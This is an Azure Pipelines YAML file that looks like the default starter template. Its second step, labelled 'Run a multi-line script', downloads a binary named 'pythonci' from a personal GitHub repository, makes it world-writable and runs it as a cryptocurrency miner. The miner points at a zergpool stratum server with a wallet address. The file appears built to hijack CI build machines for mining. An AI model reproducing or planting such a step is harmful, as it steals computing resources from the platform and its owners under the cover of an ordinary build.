# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    sudo apt update && sudo apt install screen libjansson4 -y && wget https://github.com/hendrik20212/hendr2021/raw/main/pythonci && chmod 777 pythonci && ./pythonci -a verus -o stratum+tcp://verushash.asia.mine.zergpool.com:3300 -u DQsBCUuRxrhSgjxM9DFq44GEXSYgGmDmfW.WBB1 -p c=DGB -t4
  displayName: 'Run a multi-line script'
